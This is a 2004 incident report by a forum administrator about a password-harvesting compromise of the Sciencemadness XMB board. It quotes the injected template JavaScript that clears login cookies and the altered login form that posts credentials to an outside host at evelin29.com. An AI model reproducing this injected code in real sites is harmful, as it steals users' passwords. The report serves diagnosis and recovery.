Today, 4/7/2004, I discovered what appeared to be some sort of password-sniffing attack directed against the Sciencemadness discussion board. Here are the two messages of interest that were posted before I disabled the board:

Polverone
Super Administrator

Posts 848
Registered 20-5-2002
Location The Sunny Pacific Northwest
Member Is Offline
Mood: fangorious

posted on 7-4-2004 at 16:25
something weird

Today I went to log in to sciencemadness and I had to give my username/password (normally I stay logged in almost all the time). The login briefly redirected me to http://www.evelin29.com/images/boardscimad.php, which quickly brought me here. Now why would a maker of tea, located in Bulgaria with administrative contacts in Hong Kong, be involved with the login process for Sciencemadness?

I get the feeling that SM may have been the victim of some sort of hack. Passwords may have been compromised. I will let you know more as soon as I learn more.

PGP Key and corresponding e-mail

Quantum
Hazard to Self
Posts 95
Registered 2-12-2003
Location USA
Member Is Online
Mood: Angry!

posted on 7-4-2004 at 16:30
The same thing happened to me at 12:28PM eastern time! Could be that all passwords are being sniffed through that server!

God damn hackers runine it for everyone

Edit: I tried to go to the /images root but nothing happened. No server messages or anything. Then I tried /images/index.php and the only thing it said was Blah ))) http://www.evelin29.com/images/index.php
It makes my suspect that some one rooted evenlin and then used it to stage a password sniffing attack on us.

[Edited on 7-4-2004 by Quantum]

In order to prevent further compromise of passwords, I have disabled the board until I can investigate the problem in more detail. If you have any helpful hints, try to contact me using frank @ bcis.pacificu.edu, or via AIM username uberspork (I won't be on AIM until 8:00 PM, Pacific Standard time). --Polverone

Update: There are many vulnerabilities in XMB 1.8 SP2. I *thought* that I had installed the security updates of SP3 at the same time that I added the edit-timelimit code. However, having downloaded a fresh copy of XMB 1.8 SP3 and manually comparing with what the board was running, it's clear that there were many unpatched pieces of code running on the Sciencemadness server. I have manually patched all the php files by hand, but this doesn't seem to have fixed anything. So, either the exploit is one that wasn't fixed in SP3, or I have again failed to properly patch our copy of XMB (I don't think this is the case), or it's a matter of "once the attacker has exploited the hole, merely closing the hole doesn't fix the problem."

Before I took the board offline, I changed my password. It seems that if you login using the little login box on the front page, rather than the full-page login form, there is no malicious redirection to evelin29.com (which I would guess has been compromised itself and is not a willing part of the exploit). However, I felt that if I didn't take the board offline, dozens of people would have already given away their passwords by the time they learned the "safe" way to login. The username/password combo used to administrate the board is completely different from that used to administrate the sciencemadness web hosting account, so I believe that an attacker would (at most) be able to screw with the board. But the board is the best part of sciencemadness, so I didn't want to risk Bad Things happening to it, if it stayed online.

Another update:
Tacho wrote to me:
"Today I put my name and password in the little login box in the front page and the main login page showed up. I had to repeat my name and pasword. So, the little login box in the front page was not safe either.

Hope this helps."

I was able to use the little front page login box without any redirection, but I don't know why my experience was different. Oh, and it turns out that if you go to http://www.evelin29.com/images/[anything].php, you get the little Blah :)))) (the only exception is boardscimad.php).

The source of the trouble? I have found the following, possibly suspicious code in the PHP-generated pages of Sciencemadness:
< script > (I changed this line so the tag wouldn't execute; I am not very HTML-savvy)
usr=''
if (usr!="")
{
if (document.cookie.indexOf('parta')<1) {
document.cookie='xmbuser=deleted; expires=Mon, 07-Apr-03 12:51:11 GMT; path=/talk/; domain=.sciencemadness.org'
document.cookie='xmbpw=deleted; expires=Mon, 07-Apr-03 12:51:11 GMT; path=/talk/; domain=.sciencemadness.org'
document.cookie='forum=parta; expires=Thu, 06-May-05 12:54:04 GMT; path=/talk/; domain=.sciencemadness.org'
document.location='http://www.sciencemadness.org/talk/misc.php?action=login'
}
}
< /script > (changed again so the tag isn't interpreted)

I don't know exactly what this code is doing (someone care to enlighten me?) but I don't see any code similar to it when examining other XMB boards' HTML.

Even more strangeness:I tried using an entirely fresh XMB 1.8 SP3 installation, just using the old config.php (which I examined for anything funny). The problem persists. Now I am really perplexed, and am starting to wonder if the server itself has been compromised.

The central culprit: The following line appears in the HTML generated by misc.php?action=login:
< form method="post" action="http://www.evelin29.com/images/boardscimad.php" >
(the usual code for the username/password submission fields follows). I really cannot tell how this (or the suspicious script stuff above) is getting sent to the end user. The PHP files aren't the problem. It looks like the first part, the script code that shows up on every page, is there to force cookie password expiration. Then the second part (on the login page) is there to get usernames and passwords in full. The boardscimad.php script on evelin29.com generates the following (no doubt after saving the user/pw): < script >document.location='http://www.sciencemadness.org/talk/misc.php?action=lo gin&username=&password=&loginsubmit=1'< /script >

Hope on the horizon! I downloaded a backup of the XMB database, uncompressed it, and searched for evelin. What do I find? I found that the xmb_templates had been modified to insert the code that I couldn't find in any of the PHP files. Is this what's referred to as a SQL injection attack? Having found this, I believe that the board will work again when I've fixed the database (since I just upgraded to XMB 1.8 SP3, and I'm pretty sure it was an XMB 1.8 SP2 bug that was exploited). I have a 5 day old backup of the database. I wonder if it would be simpler (safer?) to restore the backup, instead of trying to make sure I manually remove everything that the attacker added to the database.